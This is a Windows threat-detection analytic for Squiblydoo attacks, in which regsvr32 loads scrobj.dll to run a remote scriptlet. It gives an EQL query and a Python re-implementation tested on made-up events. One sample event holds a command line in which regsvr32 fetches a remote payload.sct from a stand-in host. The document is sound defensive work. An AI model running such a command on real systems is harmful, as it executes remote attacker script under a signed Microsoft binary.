Suspicious Script Object Execution

Identifies scrobj.dll, the Windows Script Component runtime that executes .sct scriptlets, being loaded into Microsoft processes that do not normally run scriptlets. This is the hallmark of a Squiblydoo attack, in which regsvr32.exe is invoked with an /i: argument pointing at a (often remote) scriptlet so that attacker script runs inside a signed Microsoft binary. Legitimate installers occasionally register scriptlets through regsvr32.exe, so check the process command line (an /i: argument carrying a URL is the tell) before escalating a hit.

id:a792cb37-fa56-43c2-9357-4b6a54b559c7
categories:detect
confidence:medium
os:windows
created:11/30/2018
updated:11/30/2018

MITRE ATT&CK™ Mapping

tactics:Defense Evasion, Execution
techniques:T1117 Regsvr32

Query

image_load where image_name == "scrobj.dll" and
  process_name in ("regsvr32.exe", "rundll32.exe", "certutil.exe")
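The following is an added example, not part of the EQL Analytics Library or the query above: a plain-Python re-implementation of the same analytic run over a handful of constructed image_load events, so the matching logic can be exercised offline. It assumes the field names used by the query (event_type, image_name, process_name) and additionally normalizes full paths and letter case, since a sensor may emit either a bare file name or a full path and NTFS names are case-insensitive.

```python
"""Added example: re-implements the "Suspicious Script Object Execution"
analytic in plain Python and runs it over constructed sample events.
Field names follow the EQL schema used by the query; the events themselves
are made up for illustration and do not come from any real host."""
import ntpath

# The loaders named in the EQL query.
SUSPICIOUS_LOADERS = {"regsvr32.exe", "rundll32.exe", "certutil.exe"}
TARGET_DLL = "scrobj.dll"


def _basename(path):
    """Reduce a bare name or full Windows path to a lower-case file name.

    Assumption: the sensor may emit either form, and NTFS file names are
    case-insensitive, so both are folded before comparison."""
    return ntpath.basename(path or "").lower()


def is_suspicious_script_object_load(event):
    """Return True when the event satisfies the analytic's query:
    an image_load of scrobj.dll by one of the listed Microsoft binaries."""
    if event.get("event_type") != "image_load":
        return False
    return (_basename(event.get("image_name")) == TARGET_DLL
            and _basename(event.get("process_name")) in SUSPICIOUS_LOADERS)


def find_matches(events):
    """Filter an iterable of events down to those that match."""
    return [e for e in events if is_suspicious_script_object_load(e)]


# Constructed sample telemetry (hypothetical pids, paths and command line).
SAMPLE_EVENTS = [
    # Classic Squiblydoo: regsvr32 pointed at a remote scriptlet -> match.
    {"event_type": "image_load", "pid": 4120, "process_name": "regsvr32.exe",
     "image_name": "scrobj.dll",
     "command_line": "regsvr32.exe /s /n /u /i:http://example.test/payload.sct scrobj.dll"},
    # wscript.exe is a normal scriptlet host and not in the list -> no match.
    {"event_type": "image_load", "pid": 4188, "process_name": "wscript.exe",
     "image_name": "scrobj.dll"},
    # Full path and mixed case still resolve to scrobj.dll -> match.
    {"event_type": "image_load", "pid": 4200, "process_name": "RunDll32.exe",
     "image_name": "C:\\Windows\\System32\\ScrObj.dll"},
    # Wrong event type: the query only considers image_load events -> no match.
    {"event_type": "process", "pid": 4300, "process_name": "regsvr32.exe",
     "image_name": "scrobj.dll"},
    # regsvr32 loading an unrelated DLL -> no match.
    {"event_type": "image_load", "pid": 4120, "process_name": "regsvr32.exe",
     "image_name": "kernel32.dll"},
]


if __name__ == "__main__":
    for hit in find_matches(SAMPLE_EVENTS):
        print(hit["pid"], hit["process_name"], hit["image_name"],
              hit.get("command_line", ""))
```

Running the script prints the two matching events (pids 4120 and 4200); the command line on the first is what an analyst would inspect to confirm the /i: URL before escalating.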

Contributors